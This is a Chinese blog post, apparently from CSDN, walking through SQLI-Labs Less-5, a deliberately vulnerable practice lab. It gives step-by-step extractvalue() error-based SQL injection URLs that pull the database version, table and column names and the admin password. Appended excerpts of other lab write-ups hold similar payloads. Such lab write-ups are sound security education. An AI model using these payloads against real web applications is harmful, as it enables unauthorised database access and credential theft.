SQLI-Labs:Less - 5(盲注 报错注入)

已于 2024-06-14 10:33:36 修改
阅读量308 收藏 6
点赞数 5
分类专栏: # SQLI - Labs 文章标签: sql web安全 mysql
于 2024-06-14 10:00:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43320796/article/details/139673686
版权

Less - 5

SQL注入 - 前置知识:https://blog.csdn.net/weixin_43320796/article/details/139498174
SQL注入 - M有SQL 盲注:https://blog.csdn.net/weixin_43320796/article/details/139633446

在这里插入图片描述

1. 代码审计

截取一段源代码:

在这里插入图片描述

  1. 可以看到源代码(20行)判断GET请求的id是否有值
  2. 如果有值的就(21行)赋值到$id变量
  3. (27行)SQL语句变量'$id'存在单引号干扰
    1. '闭合前面的单引号,用 --+注释后面的单引号
    2. id参数值为 1' or 1=1 --+拼接 SQL SELECT * FROM users WHERE id = '1' or 1=1 --+'LIMIT 0,1
  4. 然后代入数据库查询(28-29行)
  5. (31-35行)判断数据库查询是否有数据,有则打印'You are in...........'
  6. (36-41行)如果没有则(39行)打印MySQL错误信息
  7. 这关我们可以使用MySQL盲注的报错注入

2. 注入测试

2.1 extractvalue报错注入

  • 此处可以利用 extractvalue报错注入 尝试爆出数据库版本

    http://www.sqlilabs.kay.com/Less-5/?id=1' AND (extractvalue(1,CONCAT(0x7e,(SELECT version()),0x7e))) --+

    在这里插入图片描述

3. 构造 Payload

3.1 爆当前数据库名

http://www.sqlilabs.kay.com/Less-5/?id=1' AND (extractvalue(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))) --+

在这里插入图片描述

3.2 爆当前数据库第四个表名

http://www.sqlilabs.kay.com/Less-5/?id=1' AND (extractvalue(1,CONCAT(0x7e,(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA=database() LIMIT 3,1),0x7e))) --+

LIMIT 用法: LIMIT offset,count offset 是返回的初始标注,起始点是0,是返回的数量。

在这里插入图片描述

3.3 爆 users 表所有字段名

http://www.sqlilabs.kay.com/Less-5/?id=1' AND (extractvalue(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME='users' AND TABLE_SCHEMA=DATABASE()),0x7e))) --+

在这里插入图片描述

3.4 爆 username = adminpassword 数据

http://www.sqlilabs.kay.com/Less-5/?id=1' AND (extractvalue(1,CONCAT(0x7e,(SELECT password FROM security.users WHERE username='admin'),0x7e))) --+

在这里插入图片描述

HC-KAY
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 609
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs (less-5)
kukudeshuo的博客
03-07 3324
sqli-labs (less-5) 第五关和前面的四关就不一样了,当我们输入id=1时,页面不会再返回用户名和密码,而是返回了 You are in… 输入 http://127.0.0.1/sql1/Less-5/?id=1' 这里报错,根据错误信息我们判断为字符型注入 判断字段数 http://127.0.0.1/sql1/Less-5/?id=1' order by 3--+ http://127.0.0.1/sql1/Less-5/?id=1' order by 4--+ 判断字段数为
sqli-less5(布尔盲注报错注入
01mx的博客
03-24 677
1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:http头显错注入 20-22题:cookie显错注入 less5 输入: ?id=1 ?id=2 ?id=1 and 1=1 ?id=1 and 1=2 都显示这个,判断不是数字型, 输入: ?id=1’ and ‘1’=‘1 也显示正常; 但输入:?id=1’ and ‘1’='2 显示错误 。判
Sqli-labs之Less-5和Less-6
m0_46315342的博客
06-04 919
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
Sqli-labs之Less1-10
Mi1k7ea
04-14 4516
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
Sqli-labs--less-5
沐目的博客
04-08 4455
sqli-labs-master/Less-5/ 字符型,报错注入 首先 ?id=1’ 报错。让后用双引号,回显正常。再使用单引号+%23,回显正常,基本可以确定是单引号字符型。但是发现使用平常的 union select ,没有任何反应。 所以这道题需要一个新的知识点,刚学sql注入的同学,可能会有一点崩溃。有两种方法,叫做报错注入,其实有三种,但是我只会两种。 一、 报错注入了解一下:(报错...
sqli-labs:less-7
羽的博客
07-14 307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs:Less 11~20 通关详解
qq_45756971的博客
10-27 559
第十一关: 看到登录框,先使用弱口令进行尝试,登录成功 输入单引号尝试引起报错 猜测后台语句为: select * from where username=‘username’ and password=’$password’ 接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出 判断列数 成功查找到信息 第十二关 输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句 这里根据报错信息,使用双引号加括号闭合 第十三关 通过报错信息可以构造如下的闭合方式 这一关同
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 250
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 384
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL执行流程、SQL执行计划、SQL优化
最新发布
风中的默默
07-19 124
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值